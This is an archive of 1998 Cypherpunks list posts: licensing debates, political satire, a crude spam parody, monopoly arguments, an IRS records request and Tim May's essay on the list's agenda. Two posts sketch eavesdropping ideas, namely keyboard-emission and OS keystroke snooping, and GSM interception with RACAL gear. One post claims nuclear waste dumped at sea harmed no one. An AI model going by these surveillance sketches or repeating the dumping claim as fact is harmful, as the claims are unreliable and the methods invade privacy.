Transcribed 2nd msg from Springfield, 5 Oct 98:

To R.E. Mailer, Replay, CO 00001
Subject: Duhhh Stoned De Ranger #38

Duhhh Stoned De Ranger
(with his MindFuck, Toronto)

Psychotic Episode #38: First Signs of Toto's Arrest.

Toronto: "Pretty quiet on the CypherPunks List tonight,
eh, Kimo Slobbery?"

[Stoned De Ranger exhales & passes a 'cigarette' to
Toronto - with his 'left hand', - looks around, with
Deep Paranoia in his eyes.] <-' <-'

S. De Ranger: "Yeah, Toronto ... a little *too* quiet ... "






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 8 Oct 1998 14:24:51 +0800
To: "Eric S. Raymond" <esr@snark.thyrsus.com>
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199810080430.AAA01120@snark.thyrsus.com>
Message-ID: <199810080556.BAA02511@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain




"Eric S. Raymond" writes:
> With respect, Perry, I think you may actually have confused *three*
> different agendas.  RMS's advocacy of the GPL should not be taken to 
> represent the entire open-source community, and GPL is not the only
> license conforming to the Open Source Definition.  

As a NetBSD developer, I'm quite familiar with other available
licenses, and in fact BSD license most of my source code because I
don't particularly mind if people use my code commercially -- I see
open source as a personal choice, and *my* source will remain open
regardless of whether or not others writing against my libraries keep
their source open.

I suppose my comments were a slight simplification of the situation,
but only slight. The open source community's goals and those of the
cypherpunk community, although not diametrically opposed, are not
identical, and it is important to keep that in mind when discussing
this matter. See below.

> Accordingly, I urge you not to encourage an artificial split between 
> the cypherpunks and the open-source community.  Your licensing argument
> is not with the open-source community as a whole, it is very
> specifically with the partisans of the GPL.

Understood -- my point was more that, to an open source person, GPL
and BSD licenses are both compatible with their goals, whereas to a
cyhpherpunk, the GPL is not compatible with their goals (or at least,
not always compatible with them.) This is because their goals are not
identical to those of an open source developer (although, once again,
they are not necessarily conflicting, either -- just different, which
leads to some open source licenses being inappropriate).

BTW, on the question of RMS's argument about whether the name "open
source" is appropriate, I think Shakespeare said it better than I can.

	JULIET	'Tis but thy name that is my enemy;
		Thou art thyself, though not a Montague.
		What's Montague? it is nor hand, nor foot,
		Nor arm, nor face, nor any other part
		Belonging to a man. O, be some other name!
		What's in a name? that which we call a rose
		By any other name would smell as sweet;
		So Romeo would, were he not Romeo call'd,
		Retain that dear perfection which he owes
		Without that title. Romeo, doff thy name,
		And for that name which is no part of thee
		Take all myself.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <squirrel7@nym.alias.net>
Date: Thu, 8 Oct 1998 12:33:39 +0800
To: cypherpunks@cyberpass.net
Subject: Dr Suess - Fox in Sox Part 2
Message-ID: <1d06ad1f2bb5dc519d27c70805f025f4@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



This is a new poem found in one of Dr. Suess' books:

Starr:
I'm here to ask
As you'll soon see --
Did you grope
Miss Lewinsky?

Did you grope her
In your house?
Did you grope
Beneath her blouse?

Clinton:
I did not do that
Here or there--
I did not do that
Anywhere!

I did not do that
Near or far --
I did not do that
Starr-You-Are

Starr:
Did you smile?
Did you flirt?
Did you peek
Beneath her skirt?

And did you tell
The girl to lie
When called upon
To testify?

Clinton:
I do not like you
Starr-You-Are --
I think that you
Have gone too far

I will not answer
Any more --
Perhaps I will go
Start a war!

The public's easy
To distract --
When bombs are
Falling on Iraq!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Campbell <rick@campbellcentral.org>
Date: Thu, 8 Oct 1998 18:50:39 +0800
To: Thomas Roessler <roessler@guug.de>
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <19981007200617.C26981@sobolev.rhein.de>
Message-ID: <199810081016.GAA15032@germs.dyn.ml.org>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3997.1071713808.multipart/signed"

--Boundary..3997.1071713808.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

    Date: Wed, 7 Oct 1998 20:06:17 +0200
    From: Thomas Roessler <roessler@guug.de>
    
    On Wed, Oct 07, 1998 at 06:26:16AM -0400, Rick Campbell wrote:
    
    > Public Domain status denotes more freedom than GPL.  It allows all of
    > the freedom of GPL and in addition, it allows the freedom of making
    > proprietary modifications.
    
    Making proprietary changes to GPLed software for your own use seems
    to be fine with the GPL.  The problem occurs if you are giving away
    changed versions of software: While GPL will force you to give your
    distributed software's users the same freedom you enjoyed yourself
    when creating the software, PD won't preserve that freedom.
    
    Thus, GPL is the license model which most consequently follows the
    freedom for end users thread of thinking.

I see, so GPL offers you additional freedoms, like the freedom to be
forced into a particular action.  Cool :-)

Really, the end user of Public Domain software has more freedom than
the end user of GPLed software.  They have every freedom allowed by
GPL, plus the freedom to make derivative works (which might not have
the same level of freedom) that are proscribed by the GPL.  It really
makes no sense to me for someone to argue that when your actions are
restricted you are more free.

When I read RMS' arguments in favor of GPL, I can't help but note a
certain ``nah nah na nah nah'' childish quality to them. ``Well, if
you won't let me use yours, then I won't let you use mine'' is the
root of the arguments.  I don't think that there's anything wrong with
wanting an arrangment like that, I just think that it's ridiculous to
try to twist that into telling people that by restricting them you're
really helping them.  You're not, period.

			Rick


--Boundary..3997.1071713808.multipart/signed
Content-Type: application/octet-stream; name="pgp00002.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00002.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zaWEK
Q29tbWVudDogUHJvY2Vzc2VkIGJ5IE1haWxjcnlwdCAzLjQsIGFuIEVtYWNz
L1BHUCBpbnRlcmZhY2UKCmlRQ1ZBd1VCTmh5UTV4SWU5MVViOERjRkFRR2tz
d1A5R1gwS2tJWTdCYUsxelo3Q3FFcUw5RXVmRmwxdVZBc2EKWm5Fd0s3R1VQ
c1BHQXZNSWtKNGdSbys4aXo1Umxyc0VFSGJhdkpFVmNjL3ZTSlhNSjI2VmFV
YkQyUUlldFYvNQpwTUpVVDJ4WGNldlFPQkRaVEpxU2dsZ2hhSjRkUWRoOWZC
NnhtcUlocU13RjlwMGNQUGNHVEcxZEVXNHVLV1JFCjRSRS8rc0Ztdnp3PQo9
d2JFTQotLS0tLUVORCBQR1AgTUVTU0FHRS0tLS0tCg==
--Boundary..3997.1071713808.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 8 Oct 1998 22:47:59 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810062119.QAA09408@einstein.ssz.com>
Message-ID: <4.0.2.19981008065313.00c7aef0@shell11.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



At 04:19 PM 10/6/98 -0500, Jim Choate wrote:
> Who said anything about 'artificial'? You have a sneaky
> habit of sticking terms in there where they don't go hoping
> somebody won't catch it. We're talking a free-market, there
> are *only* two participants; provider and consumer. If I
> allow 'artificial' in there then there is the explicit 
> assumption that a third party is now involved. I won't
> accept a bastardization of free-market in that manner.

Then your argument that free markets lead to monopoly collapses.

You cannot have monopoly (in the sense of the power to extract monopoly of
profits) except by state intervention as has been proven by experience time
and time again.

You have been unable to provide any examples of monopolies except those
created by state intervention, such as the railaways, and those existent
soley in your fevered imagination, such as the garment industry.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     LYz7nvyPxn5hJWCXB0WcID5+PVA+dhSjuuYvr+XY
     4UUZjd22g+i9n8TWluBRaLIz63RwJtaCWan7vyEZI
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 8 Oct 1998 22:57:27 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: I thought of an initialy regulated industry!... (fwd)
In-Reply-To: <199810080256.VAA15750@einstein.ssz.com>
Message-ID: <199810081426.HAA20758@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:56 PM 10/7/98 -0500, Jim Choate wrote:
> A 1000MW coal plant produces approx 300,000 tons of waste
> product per year. A nuclear plan produces .5. This means
> the concentration of the chemicals in the coal plant are
> much lower by many orders of magnitude than the nuclear, 
> hence making the nuclear waste more toxic by a great deal.

If dilution is an acceptable option, then we should just dump
nuclear waste in the ocean.  In fact the Russians have been
doing that for many years, and no one has been able to
produce any suffering victims from the ocean dumping. 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     8DBX+n7Cw8KUOOflsTi5CbjXTm3eCscPcNFfMjY
     49Ej9qiN+YfvwjNFrr5TOXfcgeL8XcNHEMyCtoPNT
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 8 Oct 1998 22:53:06 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810080405.XAA15974@einstein.ssz.com>
Message-ID: <199810081426.HAA20770@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:05 PM 10/7/98 -0500, Jim Choate wrote:
> > Those were monopolistic markets?  If not, you're 
> > forgetting the whole basis of the discussion.

> At the time. Absolutely.

Jim Choate then proceeds for several hundred lines without 
producing a single line of evidence that these markets were 
monopolistic, indeed without ever giving the slightest hint 
as to what markets he is referring to, or naming the evil 
folk who supposedly monopolized them, or even telling us what
era he is talking about. 

If real monopolies had ever existed at any time or any place
except by state intervention, Jim would be able to provide
some concrete examples.  He has not provided any examples.
Indeed he deliberately avoids the concrete, because he knows
that if he named a particular identifiable alleged
monopolist, such as the famous Standard Oil, he would be
instantly shot down with concrete statistics about market
share, price cuts, and profit margins. 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     +c3wkO3RFcnyQ+20qReU9IMbbdJlIOQ9LFuSlL
     4mYWu2FKGcax0m1hHP/qRobKOhQM6JFfGrDiwZK2m
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 8 Oct 1998 20:52:54 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code) (fwd)
Message-ID: <199810081233.HAA16766@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 08 Oct 1998 13:12:48 +0100
> From: "Frank O'Dwyer" <fod@brd.ie>
> Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)

> Well then, "Cypherpunks write code". Wide deployment of crypto
> components in closed-source programs (especially by cluebags) is neither
> necessary nor sufficient to achieve "more strong crypto" in the sense
> that Cypherpunks mean it, in my opinion. (Yes, it's better than nothing,
> but not much better.)
> 
> > The conclusion in the GNU vs. BSD/SSLeay/etc. license debate should be clear.
> 
> Well, it clearly isn't, as evidenced by the large number of fairly
> bright people arguing about it. :)

Which is why this discussion is a perfect example of why thematic or
monotonic solutions don't work for 'people' systems. The GPL folks want
credit, reward, and a say in the life cycle of their work. The BSD folks
aren't interested so much in their own credit as an economic incentive to
distribute and develop code. While  the PD group cares not one whit about
credit, economics, or distribution, just so it's available. Then there is
the 'other license' group which without specificying the prefered license is
a smorgasboard of beliefs and tastes piled into one category because of a
lack of other clear characteristics. Clearly implying that even the
GPL-BSD-PD-Other categories are insufficient to reasonably define this
issue. An apparently simple but very complex set of issues and goals.

It simply must be admitted that one license won't fulfill any groups goals
in toto, cypherpunk goals or not.

What I find really interesting about this discussion is the clear examples
of inertia in personal taste regarding licenses, all the arguing in the world
won't change that. The second aspect is that way people talk about
'cypherpunks' as some homogenious entity with definable and fixed goals.
Especialy when it is clear cypherpunks are anything but. It's almost like
some folks believe being a cypherpunk is like joining a lodge.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Thu, 8 Oct 1998 16:07:04 +0800
To: Jennifer Stinson-- BDSI <cypherpunks@einstein.ssz.com
Subject: 1999 San Antonio/Austin Guide to Business Technology
Message-ID: <fe0cba4c3c52bf685819cc34b04927d7@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Prospective Sellers are Asking for Information about Your Body and Soul

Let them know that you are local and are selling yourself into slavery 
by participating in the 1999 Guide to Slave Buying.  The Guide is an 
annual publication that is distributed to potential local and regional
buyers giving them useful buying information about slaves and servants
such as:

*  Data Entry Slaves  *  Humiliation Slaves  *  Forced Exhibitionism 
*  Slave Consulting  *  Y2K Slave Financing Plans  *  Sex Slaves
* Additional Uses For Your New Sex Slave  

I am contacting you, because you were listed in the search engines as wishing
to sell yourself into slavery to offer services tht fit the needs of the 
prospective buyers we contacted.

To get more information, go to:  http://www.sexslaves.com

or email:  alt.sex.wanted@news.demon.co.uk or alt.sex.bondage@news.demon.co.uk

**Note you will only receive this message once for each time you spam us. This is
a list, and you do not need to respond with "yes". It is automatically assumed that
you are interested in our offer.

If you are purchased, you will be abducted by a black van as you depart for
work one morning.

Jennifer Stinson-- BDSI <jstinson@trip.net> wrote:

>Prospective Buyers are Asking for Information about Your Products and Services
>
>Let them know that your company is local and can supply what they need by participating in the 
>1999 Guide to Business Technology.  The Guide is an annual publication that is distributed to local 
>and regional companies giving them useful buying information about services and products such as:
>
>*  Cellular  *  Computer Hardware  *  Computer Networking  *  Computer Software  *  Computer 
>Telephony Interface  *  Consulting  *  Emerging Technology  *  Internet Access *  Intenet Marketing  
>*  Outsourcing  *  Software Development  *  Video Conferencing  *  Wireless Communications  *  Y2K
>
>I am contacting you, because you were listed in the search engines as having products and services 
>tht fit the needs of the prospective buyers we contacted.
>
>To get more information, go to:  http://www.biztech99.com
>
>or email:  jstinson@trip.net
>
>**Note you will only receive this message once, this is not a list, you do not need to respond with 
>"remove"










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Thu, 8 Oct 1998 22:36:41 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code) (fwd)
In-Reply-To: <199810081233.HAA16766@einstein.ssz.com>
Message-ID: <Pine.LNX.3.96.981008080325.1822C-100000@jb3.fastrans.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Thu, 8 Oct 1998, Jim Choate wrote:

> Especialy when it is clear cypherpunks are anything but. It's almost like
> some folks believe being a cypherpunk is like joining a lodge.
> 
ssssshhhhhhh.....

BTW: I see your dues are not payed up.  I've checked the records and
the polaroid of you spitting on the cross is missing.  You can run,
but you can't hide, Mr Choate.

IlluminatusMonger


-----BEGIN PGP SIGNATURE-----
Version: PGP 5.0i
Charset: noconv

iQA/AwUBNhzHEulhVGT5JbsfEQJXMQCgsJzbizFp+T/RMqmXoeF2dm08giwAniAw
NakS0BUYH9yq6+cXTCof0jcG
=ihkb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Fri, 9 Oct 1998 01:24:50 +0800
To: "Frank O'Dwyer" <shamrock@netcom.com>
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish sourcecode)
In-Reply-To: <Pine.SUN.3.91.981007180953.11287B-100000@netcom4>
Message-ID: <v03110708b242a937412d@[209.109.239.29]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:12 AM -0800 10/8/98, Frank O'Dwyer wrote:
>Lucky Green wrote:
>> The conclusion in the GNU vs. BSD/SSLeay/etc. license debate should be
>>clear.
>
>Well, it clearly isn't, as evidenced by the large number of fairly
>bright people arguing about it. :)

In the case of Open E <http://www.erights.org>, the choice came down to
which license Electric Communities was comfortable with.  We ended up with
a Mozilla style license.


-------------------------------------------------------------------------
Bill Frantz       | If hate must be my prison  | Periwinkle -- Consulting
(408)356-8506     | lock, then love must be    | 16345 Englewood Ave.
frantz@netcom.com | the key.     - Phil Ochs   | Los Gatos, CA 95032, USA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 9 Oct 1998 01:22:57 +0800
To: cypherpunks@cyberpass.net
Subject: Re : Crypto AG: The NSA's Trojan Whore?
Message-ID: <361CEE62.3A5F@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



J,

This stuff has been on and off the list for quite some time now. I think
the general opinion is that you cannot trust any software that does not
come with full source code. Especially operating systems ( read :
Windows ).

Furthermore, hardware could be untrustworthy. 

As an example of the latter just imagine a keyboard chip that takes the
serial data signal, ANDs it with the clock and runs the current-limited
output through a metal loop on the die or couples it to an outside trace
that is not likely to be filtered. Instant keyboard transmitter. Short
range but probably usable. Try it outside the chip, I'll bet an old AM
radio will pick it up pretty well. If you have better receivers try 1x,
3x, 5x ... clock carrier frequencies.

What sort of other things would you design into an OS or a CPU or
peripheral chips if you wanted to snoop? Let the OS do the keysnoop for
you and send it off through the network? Keystrokes seem like the
obvious choice because they are low-bandwidth and have a high
information content but someone who's smarter can probably think of all
kinds of other stuff to send. ls -al > G-buddy. You know, keystrokes are
so low in bandwidth that I bet a receiver/recorder could be placed on
your premises, say behind an outlet for power, and checked
surreptitiously only when needed - how long would it take you to fill a
1Gb drive from your keyboard?

I don't think that there can be real security unless you use embedded
systems ( unknown to the OS and Host HW ) for critical roles and
maintain two machines - one clean in a cage, the other on-line and
without any sensitive information. Use sneakernet between the two using
media that you can readily analyse.

If I can think up a feasible method to do something in 5 minutes it was
probably already done a long time ago and the people who do this stuff
full-time have probably taken the field to amazing heights. They seem to
be able to get cooperation from commercial companies too.

Snooping probably won't be done wholesale, too expensive in terms of
manpower, and I don't know anyone who needs real security but, in
principle, everyone should have it.

mike

***
Crypto AG: The NSA's Trojan Whore?
http://caq.com/cryptogate

Are people familiar with this document?

Why shouldn't NSA have implanted this kind of back-doors
in various software and operating systems as well?

It seems to have worked so very well in the past.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick Hudson" <patrick_33@hotmail.com>
Date: Fri, 9 Oct 1998 01:42:14 +0800
To: cypherpunks@Algebra.COM
Subject: No Subject
Message-ID: <19981008171434.22488.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi

Have spent the last few weeks going through various web pages describing 
GSM cloning. Some contradicting views, but overall the point is well 
made (and quite correctly) - cloning and/interception/monitering is both 
viable and achieveable.

I recently was commissioned to look into this subject on behalf of a 
client who wished to moniter a GSM phone. Putting aside the rights and 
wrongs of the issue, we realised the objective.

In summary it is possible to moniter/intercept a GSM phone using 2 
pieces of commercially avaliable RACAL equipment, linked via a custom 
made preselector/combiner. The overall setup is easily portable and is 
controlled via a pc.

It goes without saying that RACAL do not market the hardware for the 
above purpose - it has legitimate engineering needs, and is marketed 
under that legimate need. RACAL do not make the precombiner/selector (we 
had to make that) and they do not market the software AT ALL. I suspect 
that they are aware that the hardware in conjunction with the software 
(and access to a combiner/spliter)would give access to interception. 

So you must be thinking what sim parameters (or other parameters) had to 
be programmed into the pc software programme to allow selective 
interception of a GSM phone?

Very little - in fact all that had to be programmed in was the phone 
number of the GSM handset to be targeted - and absolutely nothing else!

It's food for thought.


Best Regards 


Patrick_33@hotmail.com


*This is not for general distribution on the web, but is shared with you 
on the basis of what appears to be a serious discussion on the subject 
on your side. please respect that aspect of confidentuality and feel 
free to get back to me with any comments you may have. One important 
aspect of the exercise has been deliberatly left out, it has little 
effect on sizing or costing but none-the-less is a requirement. Most 
engineers who understand what is involved in running 2 pieces of rf 
equipment in parrallel (both in TX and RX functions)at the same time 
will understand what is left out.


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 9 Oct 1998 01:47:08 +0800
To: cypherpunks@cyberpass.net
Subject: The Cypherpunks Agenda
Message-ID: <v0313030ab242a140c921@[209.133.20.44]>
MIME-Version: 1.0
Content-Type: text/plain



I wrote a personal reply to Adam Back, including some stuff about what's
apparently happening in the Bay Area community...I may learn more if I make
it to the Saturday physical meeting at Stanford, which I hope to make.

Some of the other things I mentioned to Adam may deserve a wider audience.

Warning: this is not a a carefully-constructed major essay, just some
thoughts which have been brewing for a couple of years. I agree fully with
Adam's point that many list members, and certainly many of those who
reflexivly shout "Cypherpunks write code!" whenever political issues come
up, are _missing the point_.  What code should be written without some
grounding in what one's goals are?

I'm not calling for the usual debate about gun control, abortion, religion,
discrimination, etc. We sometimes get off, get sidetracked, on these
issues, but the debates are rarely useful.

Rather, I think we are no longer trying to figure out which building blocks
for our "agenda" are needed. Indeed, some here claim that any discussion of
goals or agendas is ipso facto "off topic."

Well, let me assure you otherwise. I was there at the beginning, at the
first meeting (called by Eric Hughes and me), in September 1992.
Politics--of  a specific sort--dominated that first meeting, and subsequent
meetings. Not politics about welfare, or minimum wages, or Democrats vs.
Republicans (or Greens vs. SDU or other national parties in whatever
countries). No, "politics" about privacy, anonymous communications, digital
cash, information markets, etc.

We spent the afternoon playing a paper-based game, using envelopes as
mixes, using bulletin boards as information markets, using "Monopoly" money
as digital cash. Far from being a worthless game, it educated people as to
how a crypto-anarchic system might work. Out of this game came the first
"anonymous remailers" (of the Cypherpunk flavor, not the Julf flavor).
First written by Eric, then improved by Hal Finney, then by many others.
Out of this first meeting came wide use of PGP...we distributed PGP 2.0,
the first "modern" version of PGP, several days after release. And out of
this meeting came "BlackNet," "Magic Money," and several other "politically
motivated" demonstrations.

Cypherpunks has _always_ been political! Those who think otherwise are
missing the boat.

Anyway, here's some of what I wrote to Adam:


At 6:50 AM -0700 10/8/98, Adam Back wrote:

>This is what I meant by my short rant about coderpunks detracting from
>the cypherpunk objective: siphons off 'punks from cypherpunks into a
>crypto-politically neutral environment.  Then it gets increasingly
>more crypto-politically neutral subscribers, and anyone reminding or
>commenting that the original aim of the game was to distribute strong
>crypto to undermine the state, gets told by the local retro moderators
>that political stuff isn't welcome.
>
>Try reading the cyphernomicon (*), if you haven't.

Thanks for the plug.

I agree fully with your point about the "crypto-politically neutral" stance
many are now taking. I see this at the few CP physical meetings I manage to
attend these days. Many of the attendees are just cogs inside companies,
and have no idea why they're working on some widget, except that "crypto is
cool" and it's "their job."

I also am fed up with the "Cypherpunks write code" mantra. Yes, code is
very, very important. But _what_ code?

And for all of the mantra-chanting, actually very few have ever written any
memorable code. We are basically "coasting" on some code (PGP, SSLeay,
Mixmaster, a few other pieces) that implement only _two_ of the building
blocks: straight encryption and mixes.

So where is the _rest_ of the code?

"Cypherpunks write code" is a mantra to shut up any discussion of which
building blocks are important to write. And yet most of the mantra chanters
are actually not writing useful or interesting code, just hacking away in
their cubicles....

Sad.


--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Fri, 9 Oct 1998 02:16:33 +0800
To: cypherpunks@cyberpass.net
Subject: (Fwd) Request for Assistance
Message-ID: <199810081752.KAA07312@cyberpass.net>
MIME-Version: 1.0
Content-Type: text/plain



What the hell is THIS:

------- Forwarded Message Follows -------
From:          Gordon Jeff  INSP <Jeff.Gordon@inspection.irs.gov>
To:            "'m1tca00@frb.gov'" <m1tca00@ccgate.FRB.GOV>
Subject:       Request for Assistance
Date:          Thu, 8 Oct 1998 10:42:12 -0400 

Hello,

The IRS and United States Attorney's office are looking for assistance
in a criminal investigation involving threatening messages which were
posted to the Cypherpunks mailing list.  This e-mail address was noted
to be one of those which receives the Cypherpunks list.  I would
appreciate it if you would contact me to discuss whether you would be
willing to assist us in this matter, and what records or information you
have relating to the Cypherpunks list.  You can contact me at this
e-mail address or at (503) 326-2787.

Thanks

Jeff 

>From Jeff.Gordon@inspection.irs.gov  Thu Oct  8 10:48:40 1998
Return-Path: <Jeff.Gordon@inspection.irs.gov> Received: from
primary.frb.gov by bksmp2.FRB.GOV (SMI-8.6/SMI-SVR4) 	id KAA29878;
Thu, 8 Oct 1998 10:48:39 -0400 Received: from new-frbgate.frb.gov
(root@new-frbgate.frb.gov [198.35.166.180]) 	by primary.frb.gov
(8.8.6/8.8.6) with ESMTP id KAA02189 	for <m1tca00@frb.gov>; Thu, 8
Oct 1998 10:48:38 -0400 (EDT) 	(envelope-from
Jeff.Gordon@inspection.irs.gov) Received: (from root@localhost) 	by
new-frbgate.frb.gov (8.8.8/8.8.8) with UUCP id KAA03072 	for
m1tca00@frb.gov; Thu, 8 Oct 1998 10:44:05 -0400 (EDT) Received: from
tcs-gateway2.treas.gov (tcs-gateway2.treas.gov [204.151.246.2]) by
newfed.frb.gov (8.8.8/8.8.8) with SMTP id KAA00110 for
<m1tca00@frb.gov>; Thu, 8 Oct 1998 10:42:24 -0400 (EDT)
(envelope-from Jeff.Gordon@inspection.irs.gov) Received: by
tcs-gateway2.treas.gov id KAA00684 (InterLock SMTP Gateway 3.0 for
m1tca00@frb.gov); Thu, 8 Oct 1998 10:42:23 -0400 Received: by
tcs-gateway2.treas.gov (Internal Mail Agent-2); Thu, 8 Oct 1998
10:42:23 -0400 Received: by tcs-gateway2.treas.gov (Internal Mail
Agent-1); Thu, 8 Oct 1998 10:42:23 -0400 Message-Id:
<9F00F15E736BD11196B700A0C98448FE0A97B6@WR-SEA-SERVER-2> From: Gordon
Jeff  INSP <Jeff.Gordon@inspection.irs.gov> To: "'m1tca00@frb.gov'"
<m1tca00@ccgate.FRB.GOV> Subject: Request for Assistance Date: Thu, 8
Oct 1998 10:42:12 -0400 Return-Receipt-To: Gordon Jeff  INSP
<Jeff.Gordon@inspection.irs.gov> Mime-Version: 1.0 X-Mailer: Internet
Mail Service (5.5.1960.3) Content-Type: text/plain content-length: 548
X-folder: +inbox

Thanks

Jeff 


-_-_-_-_-_-_-_-_-_-_-_-_-_-

Thanks.  View my site from:

http://ross.adnetsol.com/links.html  Click on "Internet Auctions"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Allard <m1tca00@FRB.GOV>
Date: Thu, 8 Oct 1998 23:37:34 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199810081453.KAA05551@maue1.frb.gov>
MIME-Version: 1.0
Content-Type: text/plain

To: "'m1tca00@frb.gov'" <m1tca00@ccgate.FRB.GOV>
Subject: Request for Assistance
From: Gordon Jeff  INSP <Jeff.Gordon@inspection.irs.gov>
Date: Thu, 8 Oct 1998 10:42:12 -0400 
Return-Receipt-To: Gordon Jeff  INSP <Jeff.Gordon@inspection.irs.gov>

Hello,

The IRS and United States Attorney's office are looking for assistance
in a criminal investigation involving threatening messages which were
posted to the Cypherpunks mailing list.  This e-mail address was noted
to be one of those which receives the Cypherpunks list.  I would
appreciate it if you would contact me to discuss whether you would be
willing to assist us in this matter, and what records or information you
have relating to the Cypherpunks list.  You can contact me at this
e-mail address or at (503) 326-2787.

Thanks

Jeff 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 9 Oct 1998 00:28:18 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: I thought of an initialy regulated industry!... (fwd)
Message-ID: <199810081602.LAA17602@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 08 Oct 1998 14:47:34 +0000
> From: Michael Hohensee <mah248@is9.nyu.edu>
> Subject: Re: I thought of an initialy regulated industry!... (fwd)

> The latter does not necessarily follow from the former.  Consider the
> example of natural gas and gasoline.  You don't get to conclude your
> argument that easily! :)

And you don't get to try such short ones either....

What specificaly is there about the relationship between natural gas and
gasoline that leads you to believe that the comparison of lethality between
the waste products of a coal plant vurses a nuclear plant is such that the
waste of a nuclear plant is more lethal because there is more toxic
byproduct and it is in higher concentrations?


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

